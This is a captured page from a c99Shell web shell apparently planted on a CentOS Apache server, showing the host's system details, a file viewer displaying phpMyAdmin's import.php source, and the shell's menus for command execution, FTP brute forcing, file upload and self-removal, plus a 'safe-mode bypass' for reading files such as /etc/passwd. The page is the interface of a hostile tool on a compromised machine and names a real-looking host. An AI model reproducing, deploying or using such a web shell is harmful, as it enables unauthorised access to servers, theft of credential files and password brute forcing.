!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/   drwxrwxrwx
Free 52.6 GB of 127.8 GB (41.16%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     import.php (13.18 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
$db, 'user' => $cfg['Bookmark']['user'], 'query' => urlencode($import_text), 'label' => $bkm_label ); // Should we replace bookmark? if (isset($bkm_replace)) { $bookmarks = PMA_listBookmarks($db, $cfg['Bookmark']); foreach ($bookmarks as $key => $val) { if ($val == $bkm_label) { PMA_deleteBookmarks($db, $cfg['Bookmark'], $key); } } } PMA_addBookmarks($bfields, $cfg['Bookmark'], isset($bkm_all_users)); $bookmark_created = TRUE; } // end store bookmarks // We can not read all at once, otherwise we can run out of memory $memory_limit = trim(@ini_get('memory_limit')); // 2 MB as default if (empty($memory_limit)) { $memory_limit = 2 * 1024 * 1024; } // In case no memory limit we work on 10MB chunks if ($memory_limit = -1) { $memory_limit = 10 * 1024 * 1024; } // Calculate value of the limit if (strtolower(substr($memory_limit, -1)) == 'm') { $memory_limit = (int)substr($memory_limit, 0, -1) * 1024 * 1024; } elseif (strtolower(substr($memory_limit, -1)) == 'k') { $memory_limit = (int)substr($memory_limit, 0, -1) * 1024; } elseif (strtolower(substr($memory_limit, -1)) == 'g') { $memory_limit = (int)substr($memory_limit, 0, -1) * 1024 * 1024 * 1024; } else { $memory_limit = (int)$memory_limit; } $read_limit = $memory_limit / 4; // Just to be sure, there might be lot of memory needed for uncompression // handle filenames if (!empty($local_import_file) && !empty($cfg['UploadDir'])) { // sanitize $local_import_file as it comes from a POST $local_import_file = PMA_securePath($local_import_file); $import_file = PMA_userDir($cfg['UploadDir']) . $local_import_file; } elseif (empty($import_file) || !is_uploaded_file($import_file)) { $import_file = 'none'; } // Do we have file to import? if ($import_file != 'none' && !$error) { // work around open_basedir and other limitations $open_basedir = @ini_get('open_basedir'); // If we are on a server with open_basedir, we must move the file // before opening it. The doc explains how to create the "./tmp" // directory if (!empty($open_basedir)) { $tmp_subdir = (PMA_IS_WINDOWS ? '.\\tmp\\' : './tmp/'); // function is_writeable() is valid on PHP3 and 4 if (is_writeable($tmp_subdir)) { $import_file_new = $tmp_subdir . basename($import_file); if (move_uploaded_file($import_file, $import_file_new)) { $import_file = $import_file_new; $file_to_unlink = $import_file_new; } } } // Handle file compression $compression = PMA_detectCompression($import_file); if ($compression === FALSE) { $message = $strFileCouldNotBeRead; $show_error_header = TRUE; $error = TRUE; } else { switch ($compression) { case 'application/bzip2': if ($cfg['BZipDump'] && @function_exists('bzopen')) { $import_handle = @bzopen($import_file, 'r'); } else { $message = sprintf($strUnsupportedCompressionDetected, $compression); $show_error_header = TRUE; $error = TRUE; } break; case 'application/gzip': if ($cfg['GZipDump'] && @function_exists('gzopen')) { $import_handle = @gzopen($import_file, 'r'); } else { $message = sprintf($strUnsupportedCompressionDetected, $compression); $show_error_header = TRUE; $error = TRUE; } break; case 'application/zip': if ($cfg['GZipDump'] && @function_exists('gzinflate')) { include_once('./libraries/unzip.lib.php'); $import_handle = new SimpleUnzip(); $import_handle->ReadFile($import_file); if ($import_handle->Count() == 0) { $message = $strNoFilesFoundInZip; $show_error_header = TRUE; $error = TRUE; } elseif ($import_handle->GetError(0) != 0) { $message = $strErrorInZipFile . ' ' . $import_handle->GetErrorMsg(0); $show_error_header = TRUE; $error = TRUE; } else { $import_text = $import_handle->GetData(0); } // We don't need to store it further $import_handle = ''; } else { $message = sprintf($strUnsupportedCompressionDetected, $compression); $show_error_header = TRUE; $error = TRUE; } break; case 'none': $import_handle = @fopen($import_file, 'r'); break; default: $message = sprintf($strUnsupportedCompressionDetected, $compression); $show_error_header = TRUE; $error = TRUE; break; } } if (!$error && $import_handle === FALSE) { $message = $strFileCouldNotBeRead; $show_error_header = TRUE; $error = TRUE; } } elseif (!$error) { if (!isset($import_text) || empty($import_text)) { $message = $strNothingToImport; $show_error_header = TRUE; $error = TRUE; } } // Convert the file's charset if necessary if ($cfg['AllowAnywhereRecoding'] && $allow_recoding && isset($charset_of_file)) { if ($charset_of_file != $charset) { $charset_conversion = TRUE; } } elseif (PMA_MYSQL_INT_VERSION >= 40100 && isset($charset_of_file) && $charset_of_file != 'utf8') { PMA_DBI_query('SET NAMES \'' . $charset_of_file . '\''); // We can not show query in this case, it is in different charset $sql_query_disabled = TRUE; $reset_charset = TRUE; } // Something to skip? if (!$error && isset($skip)) { $original_skip = $skip; while ($skip > 0) { PMA_importGetNextChunk($skip < $read_limit ? $skip : $read_limit); $read_multiply = 1; // Disable read progresivity, otherwise we eat all memory! $skip -= $read_limit; } unset($skip); } if (!$error) { // Check for file existance if (!file_exists('./libraries/import/' . $format . '.php')) { $error = TRUE; $message = $strCanNotLoadImportPlugins; $show_error_header = TRUE; } else { // Do the real import $plugin_param = $import_type; require('./libraries/import/' . $format . '.php'); } } // Cleanup temporary file if ($file_to_unlink != '') { unlink($file_to_unlink); } // Reset charset back, if we did some changes if ($reset_charset) { PMA_DBI_query('SET CHARACTER SET utf8'); PMA_DBI_query('SET SESSION collation_connection =\'' . $collation_connection . '\''); } // Show correct message if (!empty($id_bookmark) && $action_bookmark == 2) { $message = $strBookmarkDeleted; $display_query = $import_text; $error = FALSE; // unset error marker, it was used just to skip processing } elseif (!empty($id_bookmark) && $action_bookmark == 1) { $message = $strShowingBookmark; } elseif ($bookmark_created) { $special_message = '[br]' . sprintf($strBookmarkCreated, htmlspecialchars($bkm_label)); } elseif ($finished && !$error) { if ($import_type == 'query') { $message = $strSuccess; } else { $message = sprintf($strImportSuccessfullyFinished, $executed_queries); } } // Did we hit timeout? Tell it user. if ($timeout_passed) { $message = $strTimeoutPassed; if ($offset == 0 || (isset($original_skip) && $original_skip == $offset)) { $message .= ' ' . $strTimeoutNothingParsed; } } // Display back import page require_once('./libraries/header.inc.php'); // There was an error? if (isset($my_die)) { foreach ($my_die AS $key => $die) { PMA_mysqlDie($die['error'], $die['sql'], '', $err_url, $error); echo '
'; } } if ($go_sql) { if (isset($_GET['pos'])) { // comes from the Refresh link $pos = $_GET['pos']; } else { // Set pos to zero to possibly append limit $pos = 0; } require('./sql.php'); } else { $active_page = $goto; require('./' . $goto); } exit(); ?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0047 ]--